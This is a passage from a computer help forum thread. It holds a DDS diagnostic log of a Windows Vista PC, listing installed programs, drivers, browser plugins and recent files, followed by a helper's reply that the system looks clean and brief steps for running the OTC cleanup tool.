    mPolicies-explorer: BindDirectlyToPropertySetStorage = 0 (0x0)
    mPolicies-system: EnableLUA = 0 (0x0)
    mPolicies-system: EnableUIADesktopToggle = 0 (0x0)
    IE: Download with &Shareaza - c:\program files\shareaza\RazaWebHook32.dll/3000
    IE: E&xport to Microsoft Excel - c:\progra~1\micros~3\office11\EXCEL.EXE/3000
    IE: {49783ED4-258D-4f9f-BE11-137C18D3E543} - c:\poker\titan poker\casino.exe
    IE: {A68FC757-51CF-4f3c-B13A-BFB8CA69BB99} - c:\poker\cdpoker\casino.exe
    IE: {A99C8F70-4D5B-482c-8854-05BC0BB8B182} - c:\gnuf\poker\MPPoker.exe
    IE: {B723B1B8-9788-4684-ADA7-D1DB02E1D516} - c:\poker\noble poker\casino.exe
    IE: {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - c:\programs\partygaming\partypoker\RunApp.exe
    IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503} - c:\progra~1\micros~3\office11\REFIEBAR.DLL
    DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab
    DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_17-windows-i586.cab
    DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} - hxxp://fpdownload.macromedia.com/get/flashplayer/current/polarbear/ultrashim.cab
    DPF: {CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_17-windows-i586.cab
    DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_17-windows-i586.cab
    DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
    DPF: {D8089245-3211-40F6-819B-9E5E92CD61A2} - hxxps://mppv2flash3.valueactive.com/PokerShare/FlashAX.cab
    DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
    TCP: {019BBC51-493A-48CD-8901-399505DA1F8B} = 62.231.32.10,62.231.32.11,4.2.2.1,4.2.2.2
    Notify: !SASWinLogon - c:\program files\superantispyware\SASWINLO.dll
    AppInit_DLLs: c:\windows\system32\guard32.dll
    SEH: SABShellExecuteHook Class: {5ae067d3-9afb-48e0-853a-ebb7f4a000da} - c:\program files\superantispyware\SASSEH.DLL

    ================= FIREFOX ===================

    FF - ProfilePath - c:\users\lennon\appdata\roaming\mozilla\firefox\profiles\bigxufq1.default\
    FF - prefs.js: browser.startup.homepage - hxxp://www.google.ie/
    FF - plugin: c:\program files\google\google earth\plugin\npgeplugin.dll
    FF - plugin: c:\program files\google\update\1.2.145.5\npGoogleOneClick8.dll
    FF - plugin: c:\program files\google\update\1.2.183.13\npGoogleOneClick8.dll
    FF - plugin: c:\program files\google\update\1.2.183.7\npGoogleOneClick8.dll
    FF - plugin: c:\program files\mozilla firefox\plugins\npFoxitReaderPlugin.dll
    FF - plugin: c:\program files\opera 9.5 beta\program\plugins\NPOFFICE.DLL
    FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin.dll
    FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin2.dll
    FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin3.dll
    FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin4.dll
    FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin5.dll
    FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin6.dll
    FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin7.dll
    FF - plugin: c:\program files\opera\program\plugins\np_gp.dll
    FF - plugin: c:\program files\opera\program\plugins\npFoxitReaderPlugin.dll
    FF - plugin: c:\program files\opera\program\plugins\nppl3260.dll
    FF - plugin: c:\program files\opera\program\plugins\nprpjplug.dll
    FF - plugin: c:\users\lennon\appdata\local\google\update\1.2.183.13\npGoogleOneClick8.dll
    FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\microsoft.net\framework\v3.5\windows presentation foundation\dotnetassistantextension\
    FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0010-ABCDEFFEDCBA}
    FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0012-ABCDEFFEDCBA}
    FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBA}
    FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA}

    ---- FIREFOX POLICIES ----
    c:\program files\mozilla firefox\greprefs\security-prefs.js - pref("security.ssl3.rsa_seed_sha", true);

    ============= SERVICES / DRIVERS ===============

    R1 cmdGuard;COMODO Firewall Pro Sandbox Driver;c:\windows\system32\drivers\cmdguard.sys [2008-8-7 128376]
    R1 cmdHlp;COMODO Firewall Pro Helper Driver;c:\windows\system32\drivers\cmdhlp.sys [2008-8-7 29520]
    R1 MpFilter;Microsoft Malware Protection Driver;c:\windows\system32\drivers\MpFilter.sys [2009-6-18 142832]
    R1 SASDIFSV;SASDIFSV;c:\program files\superantispyware\sasdifsv.sys [2009-11-11 9968]
    R1 SASKUTIL;SASKUTIL;c:\program files\superantispyware\SASKUTIL.SYS [2009-11-11 74480]
    R2 AERTFilters;Andrea RT Filters Service;c:\windows\system32\AERTSrv.exe [2007-12-5 77824]
    R2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe [2009-3-16 180224]
    R2 postgresql-8.3;PostgreSQL Server 8.3;C:/Program Files/PostgreSQL/8.3/bin/pg_ctl.exe runservice -N "postgresql-8.3" -D "C:/Program Files/PostgreSQL/8.3/data" -w --> C:/Program Files/PostgreSQL/8.3/bin/pg_ctl.exe runservice -N postgresql-8.3 [?]
    R3 MpNWMon;Microsoft Malware Protection Network Driver;c:\windows\system32\drivers\MpNWMon.sys [2009-6-18 42480]
    R3 NmPar;MosChip PCI Parallel Port;c:\windows\system32\drivers\NmPar.sys [2006-12-19 81408]
    R3 SASENUM;SASENUM;c:\program files\superantispyware\SASENUM.SYS [2009-11-11 7408]
    S2 gupdate1c9e852b942f080;Google Update Service (gupdate1c9e852b942f080);c:\program files\google\update\GoogleUpdate.exe [2009-6-8 133104]
    S3 FontCache;Windows Font Cache Service;c:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation [2008-5-29 21504]
    S3 IntelDH;IntelDH Driver;c:\windows\system32\drivers\IntelDH.sys [2008-4-24 5632]
    S3 NPF;NetGroup Packet Filter Driver;c:\windows\system32\drivers\npf.sys [2008-5-21 34576]
    S3 PSI;PSI;c:\windows\system32\drivers\psi_mf.sys [2009-6-17 12648]

    =============== Created Last 30 ================

    2009-11-29 20:11:39 0 d-----w- C:\Rooter$
    2009-11-28 18:49:16 0 d-----w- c:\programdata\TrueCrypt
    2009-11-25 03:01:53 2048 ----a-w- c:\windows\system32\tzres.dll
    2009-11-25 02:58:38 1401856 ----a-w- c:\windows\system32\msxml6.dll
    2009-11-25 02:58:37 1248768 ----a-w- c:\windows\system32\msxml3.dll
    2009-11-25 02:58:35 714240 ----a-w- c:\windows\system32\timedate.cpl
    2009-11-20 15:42:41 0 d-----w- c:\users\lennon\appdata\roaming\Malwarebytes
    2009-11-20 15:42:36 38224 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
    2009-11-20 15:42:35 19160 ----a-w- c:\windows\system32\drivers\mbam.sys
    2009-11-20 15:42:35 0 d-----w- c:\programdata\Malwarebytes
    2009-11-20 15:42:35 0 d-----w- c:\program files\Malwarebytes' Anti-Malware
    2009-11-20 15:36:57 0 d-----w- c:\programdata\SUPERAntiSpyware.com
    2009-11-20 15:36:46 0 d-----w- c:\users\lennon\appdata\roaming\SUPERAntiSpyware.com
    2009-11-20 15:36:46 0 d-----w- c:\program files\SUPERAntiSpyware
    2009-11-20 02:40:08 0 d-----w- c:\program files\MakeMKV
    2009-11-11 09:40:51 2036736 ----a-w- c:\windows\system32\win32k.sys
    2009-11-11 09:38:52 355328 ----a-w- c:\windows\system32\WSDApi.dll
    2009-11-07 15:52:37 0 d-----w- c:\programdata\XHEO INC
    2009-11-04 14:32:36 0 d-----w- c:\program files\Windows Portable Devices
    2009-11-04 14:32:29 0 ---ha-w- c:\windows\system32\drivers\Msft_User_WpdMtpDr_01_07_00.Wdf
    2009-11-04 14:31:57 0 ---ha-w- c:\windows\system32\drivers\Msft_User_WpdFs_01_07_00.Wdf
    2009-11-04 14:29:49 81920 ----a-w- c:\windows\system32\wpdbusenum.dll
    2009-11-04 14:28:48 4096 ----a-w- c:\windows\system32\oleaccrc.dll
    2009-11-04 14:28:48 234496 ----a-w- c:\windows\system32\oleacc.dll
    2009-11-04 14:28:47 555520 ----a-w- c:\windows\system32\UIAutomationCore.dll
    2009-11-04 13:06:07 1638912 ----a-w- c:\windows\system32\mshtml.tlb
    2009-11-03 19:53:49 0 d-----w- c:\program files\iPod
    2009-11-03 19:53:48 0 d-----w- c:\program files\iTunes
    2009-11-01 14:27:40 0 d-----w- C:\962431762f6499d25e8db0e08e090e
    2009-10-31 14:17:13 0 d-----w- C:\5cc8389e2cb2f2f5fc5f494a07
    2009-10-31 03:47:16 0 d-----w- c:\program files\MyDefrag v4.2.4

    ==================== Find3M ====================

    2009-11-28 18:49:13 223440 ----a-w- c:\windows\system32\drivers\truecrypt.sys
    2009-11-26 15:34:35 171552 ----a-w- c:\windows\system32\guard32.dll
    2009-11-26 15:34:29 128376 ----a-w- c:\windows\system32\drivers\cmdguard.sys
    2009-11-22 16:35:22 29520 ----a-w- c:\windows\system32\drivers\cmdhlp.sys
    2009-11-08 01:24:26 411368 ----a-w- c:\windows\system32\deploytk.dll
    2009-11-04 14:32:33 665600 ----a-w- c:\windows\inf\drvindex.dat
    2009-11-04 14:32:33 51200 ----a-w- c:\windows\inf\infpub.dat
    2009-11-04 14:32:32 143360 ----a-w- c:\windows\inf\infstrng.dat
    2009-11-04 14:32:32 143360 ----a-w- c:\windows\inf\infstor.dat
    2009-11-02 20:42:06 195456 ------w- c:\windows\system32\MpSigStub.exe
    2009-10-03 19:01:00 85504 ----a-w- c:\windows\system32\ff_vfw.dll
    2009-10-01 01:02:17 2537472 ----a-w- c:\windows\system32\wpdshext.dll
    2009-10-01 01:02:05 30208 ----a-w- c:\windows\system32\WPDShextAutoplay.exe
    2009-10-01 01:02:04 334848 ----a-w- c:\windows\system32\PortableDeviceApi.dll
    2009-10-01 01:02:02 87552 ----a-w- c:\windows\system32\WPDShServiceObj.dll
    2009-10-01 01:02:00 31232 ----a-w- c:\windows\system32\BthMtpContextHandler.dll
    2009-10-01 01:01:59 546816 ----a-w- c:\windows\system32\wpd_ci.dll
    2009-10-01 01:01:59 160256 ----a-w- c:\windows\system32\PortableDeviceTypes.dll
    2009-10-01 01:01:56 60928 ----a-w- c:\windows\system32\PortableDeviceConnectApi.dll
    2009-10-01 01:01:56 350208 ----a-w- c:\windows\system32\WPDSp.dll
    2009-10-01 01:01:56 196608 ----a-w- c:\windows\system32\PortableDeviceWMDRM.dll
    2009-10-01 01:01:56 100864 ----a-w- c:\windows\system32\PortableDeviceClassExtension.dll
    2009-10-01 01:01:54 40448 ----a-w- c:\windows\system32\drivers\WpdUsb.sys
    2009-10-01 01:01:50 226816 ----a-w- c:\windows\system32\WpdMtp.dll
    2009-10-01 01:01:49 61952 ----a-w- c:\windows\system32\WpdMtpUS.dll
    2009-10-01 01:01:49 33280 ----a-w- c:\windows\system32\WpdConns.dll
    2009-09-25 02:10:10 974848 ----a-w- c:\windows\system32\WindowsCodecs.dll
    2009-09-25 02:07:08 189440 ----a-w- c:\windows\system32\WindowsCodecsExt.dll
    2009-09-25 02:04:32 321024 ----a-w- c:\windows\system32\PhotoMetadataHandler.dll
    2009-09-25 01:49:22 1554432 ----a-w- c:\windows\system32\xpsservices.dll
    2009-09-25 01:48:08 351232 ----a-w- c:\windows\system32\XpsPrint.dll
    2009-09-25 01:38:29 847360 ----a-w- c:\windows\system32\OpcServices.dll
    2009-09-25 01:36:13 280064 ----a-w- c:\windows\system32\XpsGdiConverter.dll
    2009-09-25 01:35:31 135680 ----a-w- c:\windows\system32\XpsRasterService.dll
    2009-09-25 01:33:25 195584 ----a-w- c:\windows\system32\dxdiagn.dll
    2009-09-25 01:33:15 829440 ----a-w- c:\windows\system32\d3d10warp.dll
    2009-09-25 01:33:01 369664 ----a-w- c:\windows\system32\WMPhoto.dll
    2009-09-25 01:32:59 252928 ----a-w- c:\windows\system32\dxdiag.exe
    2009-09-25 01:31:53 519680 ----a-w- c:\windows\system32\d3d11.dll
    2009-09-25 01:31:26 486912 ----a-w- c:\windows\system32\d3d10level9.dll
    2009-09-25 01:31:21 161280 ----a-w- c:\windows\system32\d3d10_1.dll
    2009-09-25 01:31:19 218112 ----a-w- c:\windows\system32\d3d10_1core.dll
    2009-09-25 01:31:16 1030144 ----a-w- c:\windows\system32\d3d10.dll
    2009-09-25 01:31:15 828928 ----a-w- c:\windows\system32\d2d1.dll
    2009-09-25 01:30:23 481792 ----a-w- c:\windows\system32\dxgi.dll
    2009-09-25 01:30:23 190464 ----a-w- c:\windows\system32\d3d10core.dll
    2009-09-25 01:27:04 793088 ----a-w- c:\windows\system32\FntCache.dll
    2009-09-25 01:27:04 37888 ----a-w- c:\windows\system32\cdd.dll
    2009-09-25 01:27:04 1064448 ----a-w- c:\windows\system32\DWrite.dll
    2009-09-24 22:54:55 258048 ----a-w- c:\windows\system32\winspool.drv
    2009-09-24 22:54:53 667648 ----a-w- c:\windows\system32\printfilterpipelinesvc.exe
    2009-09-24 22:54:52 26112 ----a-w- c:\windows\system32\printfilterpipelineprxy.dll
    2009-09-10 16:48:01 218624 ----a-w- c:\windows\system32\msv1_0.dll
    2009-09-10 14:59:26 8147456 ----a-w- c:\windows\system32\wmploc.DLL
    2009-09-10 14:58:28 310784 ----a-w- c:\windows\system32\unregmp2.exe
    2009-09-10 02:01:02 3023360 ----a-w- c:\windows\system32\UIRibbon.dll
    2009-09-10 02:00:54 1164800 ----a-w- c:\windows\system32\UIRibbonRes.dll
    2009-09-10 02:00:36 92672 ----a-w- c:\windows\system32\UIAnimation.dll
    2009-09-04 11:41:59 60928 ----a-w- c:\windows\system32\msasn1.dll
    2009-08-21 06:16:20 44 ---h--w- c:\program files\232e4158.tmp
    2008-05-29 15:00:50 174 --sha-w- c:\program files\desktop.ini
    2006-11-02 12:42:02 30674 ----a-w- c:\windows\inf\perflib\0409\perfd.dat
    2006-11-02 12:42:02 30674 ----a-w- c:\windows\inf\perflib\0409\perfc.dat
    2006-11-02 12:42:02 287440 ----a-w- c:\windows\inf\perflib\0409\perfi.dat
    2006-11-02 12:42:02 287440 ----a-w- c:\windows\inf\perflib\0409\perfh.dat
    2006-11-02 09:20:21 287440 ----a-w- c:\windows\inf\perflib\0000\perfi.dat
    2006-11-02 09:20:21 287440 ----a-w- c:\windows\inf\perflib\0000\perfh.dat
    2006-11-02 09:20:19 30674 ----a-w- c:\windows\inf\perflib\0000\perfd.dat
    2006-11-02 09:20:19 30674 ----a-w- c:\windows\inf\perflib\0000\perfc.dat
    2008-04-25 01:28:53 8192 --sha-w- c:\windows\users\default\NTUSER.DAT

    ============= FINISH: 0:11:11.35 ===============




    UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
    IF REQUESTED, ZIP IT UP & ATTACH IT

    DDS (Ver_09-11-29.01)

    Microsoft® Windows Vista™ Home Premium
    Boot Device: \Device\HarddiskVolume3
    Install Date: 24/04/2008 18:43:02
    System Uptime: 29/11/2009 18:22:41 (6 hours ago)

    Motherboard: Dell Inc. | | 0RY007
    Processor: Intel(R) Core(TM)2 Duo CPU E6550 @ 2.33GHz | Socket 775 | 1998/333mhz

    ==== Disk Partitions =========================

    C: is FIXED (NTFS) - 239 GiB total, 92.672 GiB free.
    D: is FIXED (NTFS) - 10 GiB total, 5.788 GiB free.
    E: is CDROM ()
    F: is Removable
    G: is Removable
    H: is Removable
    I: is Removable

    ==== Disabled Device Manager Items =============

    ==== System Restore Points ===================

    RP796: 24/11/2009 04:50:47 - Scheduled Checkpoint
    RP797: 24/11/2009 13:20:44 - Windows Update
    RP798: 25/11/2009 02:17:47 - Scheduled Checkpoint
    RP799: 25/11/2009 03:01:09 - Windows Update
    RP800: 26/11/2009 15:37:20 - Windows Update
    RP801: 27/11/2009 13:33:27 - Scheduled Checkpoint
    RP802: 27/11/2009 21:42:39 - Windows Update
    RP803: 28/11/2009 06:26:03 - Windows Update
    RP804: 28/11/2009 18:43:10 - Installed Opera 10.10.
    RP806: 28/11/2009 18:48:58 - TrueCrypt installation
    RP807: 29/11/2009 18:34:07 - Windows Update

    ==== Installed Programs ======================

    7-Zip 4.65
    AC3Filter 1.62b
    Adobe Flash Player 10 ActiveX
    Adobe Flash Player 10 Plugin
    AoA Audio Extractor 1.0
    Apple Application Support
    Apple Mobile Device Support
    Apple Software Update
    ATI Catalyst Install Manager
    AutoHotkey 1.0.48.03
    AviSynth 2.5
    Betfair Poker
    Betsafe Poker
    Blue Face Network Tester
    Bonjour
    Browser Address Error Redirector
    bwin Poker
    CarbonPoker
    Catalyst Control Center - Branding
    Catalyst Control Center Core Implementation
    Catalyst Control Center Graphics Full Existing
    Catalyst Control Center Graphics Full New
    Catalyst Control Center Graphics Light
    Catalyst Control Center Graphics Previews Common
    Catalyst Control Center Graphics Previews Vista
    Catalyst Control Center HydraVision Full
    Catalyst Control Center InstallProxy
    Catalyst Control Center Localization All
    ccc-core-static
    ccc-utility
    CCC Help Chinese Standard
    CCC Help Chinese Traditional
    CCC Help English
    CCC Help Japanese
    CCC Help Korean
    CCC Help Thai
    CDPoker
    COMODO Firewall Pro
    Compatibility Pack for the 2007 Office system
    Dell Getting Started Guide
    Dell Support Center
    DellSupport
    Eraser
    Everest Poker (Remove Only)
    FastStone Image Viewer 3.9
    ffdshow [rev 3094] [2009-10-03]
    FileHippo.com Update Checker
    Foxit Reader
    Gnuf.com Poker
    Google Chrome
    Google Earth
    Google Update Helper
    GrabIt 1.7.2 Beta 4 (build 997)
    Haali Media Splitter
    HijackThis 2.0.2
    Holdem Manager
    HollywoodPoker.com
    Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
    Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
    Intel(R) Network Connections 13.5.32.0
    IrfanView (remove only)
    iTunes
    Java(TM) 6 Update 17
    JGoodies JDiskReport 1.3.1
    KeePass Password Safe 1.16
    Ladbrokes Poker
    Littlewoods Poker
    MakeMKV v1.4.8_beta
    Malwarebytes' Anti-Malware
    MansionPoker
    Media Player Classic - Home Cinema v. 1.3.1249.0
    MediaInfo 0.7.25
    MeGUI (remove only)
    Microsoft .NET Framework 3.5 SP1
    Microsoft Antimalware
    Microsoft Application Error Reporting
    Microsoft Choice Guard
    Microsoft Office PowerPoint Viewer 2007 (English)
    Microsoft Office Professional Edition 2003
    Microsoft Security Essentials
    Microsoft Silverlight
    Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
    Microsoft Visual C++ 2005 Redistributable
    Microsoft Works
    mkv2vob
    MKVtoolnix 2.9.8
    MobileMe Control Panel
    MosChip Multi-IO Controller
    Mozilla Firefox (3.5)
    Mozilla Firefox (3.5.5)
    Mozilla Thunderbird (2.0.0.19)
    Mozilla Thunderbird (2.0.0.23)
    MSVCRT
    MSXML 4.0 SP2 (KB936181)
    MSXML 4.0 SP2 (KB941833)
    MSXML 4.0 SP2 (KB954430)
    MSXML 4.0 SP2 (KB973688)
    MyDefrag v4.2.4
    Noble Poker
    Notepad++
    OGA Notifier 2.0.0048.0
    Opera 10.10
    Pacific Poker
    PartyPoker
    PingPlotter Standard 3.30.0s
    Poker
    Poker 770
    PokerStars
    PokerStove version 1.21
    PostgreSQL 8.3
    Psi (remove only)
    Purple Lounge
    QuickPar 0.9
    QuickTime
    Real Alternative 2.0.1 Lite
    Realtek High Definition Audio Driver
    RedKings Poker
    Roxio Creator Audio
    Roxio Creator Copy
    Roxio Creator Data
    Roxio Creator DE
    Roxio Creator Tools
    Roxio Express Labeler 3
    Roxio Update Manager
    SABnzbd (remove only)
    SeaMonkey (2.0)
    Secunia PSI
    Shareaza 2.5.0.0
    Skins
    SopCast 3.2.4
    SUPERAntiSpyware Free Edition
    Titan Poker
    Tower Gaming
    TrueCrypt
    TVAnts 1.0
    TVersity Codec Pack 1.2
    TVersity Media Server 1.7.2.1 Beta
    Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
    User's Guides
    VLC media player 1.0.3
    Winamp
    Windows Live Call
    Windows Live Communications Platform
    Windows Live Essentials
    Windows Live Messenger
    Windows Live Sign-in Assistant
    Windows Live Upload Tool
    WinPcap 4.1 beta4
    WinSCP 4.1.9

    ==== Event Viewer Messages From Past Week ========

    29/11/2009 05:04:12, Error: Service Control Manager [7034] - The COMODO Internet Security Helper Service service terminated unexpectedly. It has done this 1 time(s).
    28/11/2009 16:39:27, Error: Service Control Manager [7000] - The SASDIFSV service failed to start due to the following error: Cannot create a file when that file already exists.
    28/11/2009 05:29:09, Error: Ntfs [137] - The default transaction resource manager on volume S: encountered a non-retryable error and could not start. The data contains the error code.

    ==== End Of File ===========================


  • Closed Accounts Posts: 1,970 ✭✭✭ActorSeeksJob


    looks fine, I wouldn't worry

    • Download OTC to your desktop and run it
    • Click Yes to begin the Cleanup process and remove these components, including this application.
    • You will be asked to reboot the machine to finish the Cleanup process. Choose Yes.


  • Closed Accounts Posts: 5,017 ✭✭✭tsue921i8wljb3


    Thanks ASJ, I hope I can speak for others here when I say that we really appreciate the work you do in this forum.

